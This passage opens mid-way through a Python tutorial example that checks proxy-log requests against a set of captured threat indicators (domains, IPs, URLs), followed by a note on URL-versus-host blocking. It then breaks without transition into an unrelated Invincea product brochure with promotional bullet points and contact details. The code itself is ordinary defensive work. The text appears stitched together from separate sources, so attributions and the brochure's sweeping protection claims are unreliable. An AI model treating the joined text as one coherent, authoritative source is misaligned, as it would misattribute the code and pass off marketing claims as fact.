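                self.domains.add(value.lower().rstrip("."))
            elif kind == "ip":
                self.ips.add(ipaddress.ip_address(value))
            elif kind == "sha256":
                self.hashes.add(value.lower())   # for the endpoint/SIEM, not the proxy

    def matches(self, url: str):
        """Return the indicator that blocks this request, or None."""
        target = url if "://" in url else "//" + url   # CONNECT host:port form
        parts = urlsplit(target.lower())
        host = (parts.hostname or "").rstrip(".")
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            ip = None
        if ip is not None and ip in self.ips:
            return f"ip:{ip}"
        labels = host.split(".")
        for i in range(len(labels)):            # host, then each parent domain
            cand = ".".join(labels[i:])
            if cand in self.domains:
                return f"domain:{cand}"
        if (host, parts.path or "/") in self.urls:
            return f"url:{host}{parts.path}"
        return None


def evaluate_proxy_log(log_text: str, blocklist: Blocklist) -> list:
    """Parse log lines; return (client, url, reason) for every request that
    the indicator set would have blocked."""
    blocked = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[4]
        reason = blocklist.matches(url)
        if reason:
            blocked.append((client, url, reason))
    return blocked


if __name__ == "__main__":
    for client, url, reason in evaluate_proxy_log(SAMPLE_PROXY_LOG, Blocklist(CAPTURED_INDICATORS)):
        print(f"BLOCK {client} {url}  ({reason})")
```

Note the policy choice the example leaves to you: a URL indicator blocks only that URL, so the second request to cdn-update.example.net (for a logo) is allowed. Escalating a URL indicator to a host block is the usual next step when the host is attacker-controlled, and the wrong one when it is a compromised legitimate site or a shared CDN.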
The Benefit of Invincea

- Invincea protects the new perimeter, the endpoint, with an innovative solution that requires no signatures and keeps malware in an airlock
- Invincea addresses zero-days and APTs and stops them dead in their tracks
- Breaks the "Security Insanity Cycle," eliminating costly detection, remediation, and patching cycles
- Every employee in the organization is protected wherever they go
- A single user's virtual infection protects the entire enterprise: rich forensic data is fed to the rest of your security infrastructure to block requests from all users to the URLs that infected the user who clicked the link
- Invincea's threat data feeds extend the power and life of your current investments
- Every enterprise license agreement includes licenses for home use, meaning your employees are protected both at work and at home
Put Invincea to Work

To find out more about how to deploy Invincea and experience the safety our solutions provide, contact us today at 1-855-511-5967.

Learn More

Visit our website at www.invincea.com for product summaries, video demonstrations, Invincea news stories, and much more. While you are there, check out the Invincea Blog for breakdowns of trending security news articles and why they matter to you and your organization at https://www.invincea.com/newsroom/blog/.

Where to Find Us

For information security news and updates follow us on Twitter @Invincea. To catch a glimpse of life at Invincea, "like" our Invincea, Inc Facebook page. Or check out what we are talking about on our Invincea YouTube channel. You can also find us here:

Invincea, Inc.
3975 University Drive, Suite 460
Fairfax, VA 22030